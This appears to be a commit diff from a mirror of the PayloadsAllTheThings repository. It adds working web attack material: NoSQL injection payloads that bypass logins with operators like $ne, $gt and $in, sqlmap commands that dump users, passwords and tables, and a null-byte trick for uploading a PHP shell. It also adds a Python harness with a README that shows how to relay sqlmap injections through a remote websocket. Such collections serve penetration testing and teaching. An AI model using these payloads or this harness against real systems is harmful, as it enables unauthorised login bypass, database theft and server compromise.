mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Web socket + title capitalization
This commit is contained in:
parent
ef65f36902
commit
ee334f981e
@ -11,9 +11,10 @@ in URL
|
||||
username[$ne]=toto&password[$ne]=toto
|
||||
|
||||
in JSON
|
||||
{"username": {"$ne": null}, "password": {"$ne": null} }
|
||||
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
|
||||
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
|
||||
{"username": {"$ne": null}, "password": {"$ne": null}}
|
||||
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
|
||||
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
|
||||
{"username": {"$gt":""}, "password": {"$gt":""}}
|
||||
```
|
||||
|
||||
Extract length information
|
||||
@ -40,6 +41,13 @@ in JSON
|
||||
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
|
||||
```
|
||||
|
||||
Extract data with "in"
|
||||
|
||||
````json
|
||||
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
|
||||
```
|
||||
|
||||
|
||||
## Blind NoSQL
|
||||
|
||||
```python
|
||||
|
@ -117,6 +117,12 @@ transformed into U+0027 APOSTROPHE (')
|
||||
sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
|
||||
```
|
||||
|
||||
### Load a request file and use mobile user-agent
|
||||
|
||||
```powershell
|
||||
sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1
|
||||
```
|
||||
|
||||
### Custom injection in UserAgent/Header/Referer/Cookie
|
||||
|
||||
```powershell
|
||||
|
@ -31,7 +31,7 @@ Double extensions
|
||||
|
||||
### Upload tricks
|
||||
|
||||
- Null byte (eg: shell.php%00.gif, shell.php%00.png)
|
||||
- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()`
|
||||
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
||||
|
||||
### Picture upload with LFI
|
||||
|
63
Web Sockets/Files/ws-harness.py
Normal file
63
Web Sockets/Files/ws-harness.py
Normal file
@ -0,0 +1,63 @@
|
||||
#!/usr/bin/python
|
||||
import socket,ssl
|
||||
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
|
||||
from websocket import create_connection, WebSocket
|
||||
from urlparse import parse_qs
|
||||
import argparse
|
||||
import os
|
||||
|
||||
LOOP_BACK_PORT_NUMBER = 8000
|
||||
|
||||
def FuzzWebSocket(fuzz_value):
|
||||
print fuzz_value
|
||||
ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0])))
|
||||
result = ws.recv()
|
||||
return result
|
||||
|
||||
def LoadMessage(file):
|
||||
file_contents = ""
|
||||
try:
|
||||
if os.path.isfile(file):
|
||||
f = open(file,'r')
|
||||
file_contents = f.read()
|
||||
f.close()
|
||||
except:
|
||||
print ("Error reading file: %s" % file)
|
||||
exit()
|
||||
return file_contents
|
||||
|
||||
class myWebServer(BaseHTTPRequestHandler):
|
||||
|
||||
#Handler for the GET requests
|
||||
def do_GET(self):
|
||||
qs = parse_qs(self.path[2:])
|
||||
fuzz_value = qs['fuzz']
|
||||
result = FuzzWebSocket(fuzz_value)
|
||||
self.send_response(200)
|
||||
self.send_header('Content-type','text/html')
|
||||
self.end_headers()
|
||||
self.wfile.write(result)
|
||||
return
|
||||
|
||||
parser = argparse.ArgumentParser(description='Web Socket Harness: Use traditional tools to assess web sockets')
|
||||
parser.add_argument('-u','--url', help='The remote WebSocket URL to target.',required=True)
|
||||
parser.add_argument('-m','--message', help='A file that contains the WebSocket message template to send. Please place [FUZZ] where injection is desired.',required=True)
|
||||
args = parser.parse_args()
|
||||
|
||||
ws_message = LoadMessage(args.message)
|
||||
|
||||
ws = create_connection(args.url,sslopt={"cert_reqs": ssl.CERT_NONE},header={},http_proxy_host="", http_proxy_port=8080)
|
||||
|
||||
try:
|
||||
#Create a web server and define the handler to manage the
|
||||
#incoming request
|
||||
server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer)
|
||||
print 'Started httpserver on port ' , LOOP_BACK_PORT_NUMBER
|
||||
|
||||
#Wait forever for incoming http requests
|
||||
server.serve_forever()
|
||||
|
||||
except KeyboardInterrupt:
|
||||
print '^C received, shutting down the web server'
|
||||
server.socket.close()
|
||||
ws.close()
|
BIN
Web Sockets/Images/WebsocketHarness.jpg
Normal file
BIN
Web Sockets/Images/WebsocketHarness.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 82 KiB |
BIN
Web Sockets/Images/sqlmap.png
Normal file
BIN
Web Sockets/Images/sqlmap.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 93 KiB |
BIN
Web Sockets/Images/websocket-harness-start.png
Normal file
BIN
Web Sockets/Images/websocket-harness-start.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 18 KiB |
37
Web Sockets/README.md
Normal file
37
Web Sockets/README.md
Normal file
@ -0,0 +1,37 @@
|
||||
# Web Sockets Attacks
|
||||
|
||||
> The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server
|
||||
|
||||
Tools:
|
||||
|
||||
- [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
|
||||
|
||||
## Summary
|
||||
|
||||
* [Using ws-harness.py](#using-ws-harness-py)
|
||||
|
||||
## Using ws-harness.py
|
||||
|
||||
Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.
|
||||
|
||||
```powershell
|
||||
python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt
|
||||
```
|
||||
|
||||
The content of the message should contains the **[FUZZ]** keyword.
|
||||
|
||||
```json
|
||||
{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}
|
||||
```
|
||||
|
||||
Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket.
|
||||
|
||||
```python
|
||||
sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
|
||||
- [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
|
Loading…
Reference in New Issue
Block a user